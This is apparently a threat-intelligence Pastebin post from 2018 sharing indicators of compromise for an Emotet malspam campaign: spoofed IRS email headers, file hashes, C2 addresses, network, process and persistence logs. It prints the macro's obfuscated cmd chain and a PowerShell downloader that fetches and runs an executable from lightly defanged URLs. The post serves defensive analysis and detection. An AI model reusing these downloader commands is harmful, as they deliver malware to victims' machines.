SHARE
TWEET

#emotet_041218

VRad Dec 4th, 2018 (edited) 247 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet #feodo #W97M #Poweshell
  2.  
  3. https://pastebin.com/znQDtbnt
  4.  
  5. previous contact:
  6. 09/11/18    https://pastebin.com/THHMs2wg
  7. 01/10/18    https://pastebin.com/Y6DnbpHv
  8.  
  9. FAQ:
  10. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
  11. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
  12.  
  13. attack_vector
  14. --------------
  15. email attach .doc > macro > cmd > powershell > GET 5 URL > %temp%\***.exe
  16.  
  17. email_headers
  18. --------------
  19. Received: from smtp01-sa.serv.net.mx (smtp01-sa.serv.net.mx [201.150.39.117])
  20.     by srv8.victim1.com for <user0@org6.victim1.com>;
  21.     (envelope-from erandeni.perez@sepsa.org.mx)
  22. Received: from 10.8.54.72 (unknown [190.188.102.74])
  23.     by smtp01-sa.serv.net.mx (Postfix) for <user0@org6.victim1.com>;
  24. Date: Tue, 04 Dec 2018 10:56:22 -0300
  25. From: IRS Online  <erandeni.perez@sepsa.org.mx>
  26. To: user0@org6.victim1.com
  27. Subject:  Record of Account Transcript from December 04, 2018
  28.  
  29. files
  30. --------------
  31. SHA-256 a32a0481b51ec5eed9b5fbda8bbb75d9961f3f80ede0ddf2a53c51551b785eb4
  32. File name   Record of Account Transcript.doc    [OLE CF]
  33. File size   78.38 KB
  34.  
  35. SHA-256 e8f2ff23543e3d48a08b9e941de5858a298ef7830ba76c983e8c4d50dc2cbf4b
  36. File name   LwnfI36ghV.exe              [PE32 executable (GUI) Intel 80386, for MS Windows]
  37. File size   120 KB
  38.  
  39. activity
  40. **************
  41.  
  42. doc_macro:
  43. --------------
  44. command: c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""
  45.  
  46. command: C:\Windows\system32\cmd.exe CmD /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""
  47.  
  48. command: powershell.exe "$qjK='FfL';$rot=new-object Net.WebClient;$zoZ='h11p:\ vcube-vvp{.} com/0Tfl6UZQ@h11p:\ closhlab{.} com/bQh2tz4@h11p:\ dekormc{.} pl/pub/H0eeOPRkwr@h11p:\ careerzinn{.} in/nl8cpNgBAl@h11p:\ broganfamily{.} org/IXzUnQA0Q'.Split('@');$SPG='oIK';$IRS = '145';$kJl='CHs';$Taw=$env:temp+'\'+$IRS+'.exe';foreach($zLq in $zoZ){try{$rot.DownloadFile($zLq, $Taw);$YvI='TOK';If ((Get-Item $Taw).length -ge 80000) {Invoke-Item $Taw;$naH='khT';break;}}catch{}}$YKh='BhK';"
  49.  
  50.  
  51. PL_SCR:
  52. h11p:\ vcube-vvp{.} com/0Tfl6UZQ    404
  53. h11p:\ closhlab{.} com/bQh2tz4      200
  54. h11p:\ dekormc{.} pl/pub/H0eeOPRkwr 200
  55. h11p:\ careerzinn{.} in/nl8cpNgBAl  404
  56. h11p:\ broganfamily{.} org/IXzUnQA0Q    404
  57.  
  58. C2: h11p:\ 187.160.2.73:443
  59.     h11p:\ 80.149.179.98:7080
  60.     h11p:\ 200.6.168.130:990
  61.  
  62. netwrk
  63. --------------
  64. 103.246.17.7        vcube-vvp.com       GET /0Tfl6UZQ   HTTP/1.1    noUA
  65. 69.65.3.251         closhlab.com        GET /bQh2tz4    HTTP/1.1    noUA
  66. 69.65.3.251         closhlab.com        GET /bQh2tz4/   HTTP/1.1    noUA    [!This program cannot be run in DOS mode.]
  67. 187.160.2.73        187.160.2.73:443    GET /       HTTP/1.1    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
  68. 80.149.179.98       80.149.179.98:7080  GET /       HTTP/1.1    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
  69. 200.6.168.130       200.6.168.130:990   GET /       HTTP/1.1    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
  70.  
  71. comp
  72. --------------
  73. powershell.exe  103.246.17.7    80  SYN_SENT
  74. stgintel.exe    187.160.2.73    443 ESTABLISHED
  75. stgintel.exe    80.149.179.98   7080    ESTABLISHED
  76. stgintel.exe    200.6.168.130   990 ESTABLISHED
  77.  
  78. proc
  79. --------------
  80. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  81. c:\windows\SysWOW64\cmd.exe c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""
  82. C:\Windows\SysWOW64\cmd.exe CmD  /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68...)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!""
  83. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "$qjK='FfL';$rot=new-object Net.WebClient;$zoZ='h11p:\ vcube-vvp{.} com/0Tfl6UZQ@h11p:\ closhlab{.} com/bQh2tz4@h11p:\ dekormc{.} pl/pub/H0eeOPRkwr@h11p:\ careerzinn{.} in/nl8cpNgBAl@h11p:\ broganfamily{.} org/IXzUnQA0Q'.Split('@');$SPG='oIK';$IRS = '145';$kJl='CHs';$Taw=$env:temp+'\'+$IRS+'.exe';foreach($zLq in $zoZ){try{$rot.DownloadFile($zLq, $Taw);$YvI='TOK';If ((Get-Item $Taw).length -ge 80000) {Invoke-Item $Taw;$naH='khT';break;}}catch{}}$YKh='BhK';"
  84. "C:\tmp\145.exe"
  85. "C:\Users\operator\AppData\Local\stgintel\stgintel.exe"
  86.  
  87. persist
  88. --------------
  89. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              04.12.2018 22:28   
  90. stgintel    Softpub Forwarder DLL   Nexon Corp. c:\users\operator\appdata\local\stgintel\stgintel.exe   21.08.2007 4:59
  91.  
  92. drop
  93. --------------
  94. C:\tmp\145.exe
  95. C:\Users\operator\AppData\Local\stgintel\stgintel.exe
  96.  
  97. # # #
  98. https://www.virustotal.com/#/file/a32a0481b51ec5eed9b5fbda8bbb75d9961f3f80ede0ddf2a53c51551b785eb4/details
  99. https://www.virustotal.com/#/file/e8f2ff23543e3d48a08b9e941de5858a298ef7830ba76c983e8c4d50dc2cbf4b/details
  100. https://analyze.intezer.com/#/analyses/47e2d372-0318-42d4-a6fd-bd5ae3c89f9a
  101.  
  102. VR
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top